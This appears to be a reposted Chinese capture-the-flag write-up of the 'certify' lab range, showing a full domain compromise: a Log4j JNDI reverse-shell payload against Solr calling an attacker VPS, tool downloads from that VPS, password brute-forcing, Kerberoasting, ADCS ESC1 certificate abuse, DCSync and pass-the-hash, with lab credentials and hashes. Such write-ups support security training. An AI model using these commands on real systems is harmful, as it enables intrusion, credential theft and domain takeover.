靶场简介
获取入口机权限
solr存在log4j组件,于是尝试反序列化利用。
随后在action处利用dnslog探测
在dnslog平台上收到响应
攻击vps:
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
nc -lvnp 8088
GET /solr/admin/cores?_=1679974172729&action=${jndi:ldap://vpsip:1389/Basic/ReverseShell/vpsip/8088}&config=solrconfig.xml&dataDir=data&instanceDir=new_core&name=new_core1&schema=schema.xml&wt=json HTTP/1.1
Host: 47.92.246.182:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
收到shell,并成功通过grc提权
在入口机获取flag01:flag{d587f1e4-9d39-4866-ae0d-01d06edecede}
上传fscan,对当前c段进行扫描
curl
http://vpsip:8090/fscan_amd64 --output fscan_amd64
./fscan_amd64 -h
172.22.9.1
/
24
./fscan_amd64 -h 172.22.9.1/24
___ _
/ _ ___ ___ _ __ __ _ ___| | __
/ /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______ (__| | | (_| | (__| <
____/ |___/___|_| __,_|___|_|_
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.13 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 5
172.22.9.7:135 open
172.22.9.13:135 open
172.22.9.26:135 open
172.22.9.26:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.47:21 open
172.22.9.19:22 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.13:445 open
172.22.9.47:139 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.13:139 open
172.22.9.7:88 open
172.22.9.19:8983 open
[*] alive ports len is: 19
start vulscan
[*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetInfo:
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] NetInfo:
[*]172.22.9.13
[->]CA01
[->]172.22.9.13
[*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.13 XIAORANGCA01
[*] NetInfo:
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] 172.22.9.47 (Windows 6.1)
[*] NetBios: 172.22.9.7 [+]DC XIAORANGXIAORANG-DC
[*] NetBios: 172.22.9.47 fileserver Windows 6.1
[*] NetBios: 172.22.9.26 XIAORANGDESKTOP-CBKTVMO
[*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle: http://172.22.9.26 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
curl
http://vpsip:8001/frpc --output frpc
curl
http://vpsip:8001/frpc.ini --output frpc.ini
chmod
+x ./frpc
nohup
./frpc -c frpc.ini
前面通过fscan扫描发现172.22.9.47为fileserver,于是通过smbclient进行匿名连接,获取flag02:flag{ef35e055-511c-4733-80cf-3313b653a9c8}
python3 smbclient.py 172.22.9.47
在fileserver上看到了personal.db文件,利用navicat对其进行解析,并把members的name字段表当作用户名,把users表的password当作密码来进行爆破。
成功爆破出两个用户:
zhangjian-->i9XDE02pLVf
liupeng–->fiAzGwEMgTY
对dc的netbios进行查询,发现域名为xiaorang.lab
crackmapexec smb 172.22.9.7
前面获取了两个域用户的账号密码,通过https://github.com/lzzbb/Adinfo获取整个域结构。
./Adinfo_darwin -d xiaorang.lab --dc 172.22.9.7 -u zhangjian -p i9XDE02pLVf
上图发现有用户存在Asrep Roasting 漏洞,我们知道如果某个域内用户存在Asrep Roasting漏洞,那么我们可以在不知道他密码的情况下,获取他的logonsession key,然后通过hacshacat进行爆破。
先通过impacket中的GetUserSPNs.py获取其logonsession key
python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY
然后通过hashcat将上一步的logonsession key进行暴力破解,获得zhangxia/MyPass2@@6
hashcat -m 13100 roasting.txt pass.txt --force --show
前面同样通过Adinfo发现了域内存在ADCS,于是我们可以通过https://github.com/ly4k/Certipy对域内的ADCS进行漏洞探测。
发现域内存在ESC-1漏洞,对应模版为”XR Manager”
certipy find -u [email protected] -p MyPass2@@6 -dc-ip 172.22.9.7 -stdout -vulnerable
尝试certipy利用,导出失败,显示KDC_ERR_PADATA_TYPE_NOSUP错误
certipy req -username [email protected] -password "MyPass2@@6" -ca xiaorang-CA01-CA -target CA01.xiaorang.lab -template "XR Manager" -upn [email protected]
certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
这是因为域控不支持 PKINIT,利用passthecert进行bypass,并设置zhangxia的dcsync属性
certipy cert -pfx administrator.pfx -nokey -out user.crt
certipy cert -pfx administrator.pfx -nocert -out user.key
python3 passthecert.py -action modify_user -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.9.7 -target zhangxia -elevate
现在zhangxia已经有了dcsync权限,从而获取域内域管administrator的hash
python3
secretsdump
.py
zhangxia
:"MyPass2
@@
6
"@
172
.
22
.
9
.
7
-just-dc-user administrator
通过administrator的hash进行wmiexec,获得flag04:flag{fabfa137-e0ef-4dca-aca3-f9d1e6fde081}
python3 wmiexec.py [email protected] -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
还有一台域内机器172.22.9.26没有利用,通过wmi进行连接
得到flag03:flag{0deb6c8b-2f32-4351-925f-66cead070365}
原文始发于微信公众号(猫蛋儿安全):【内网攻防】春秋云镜-certify-WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论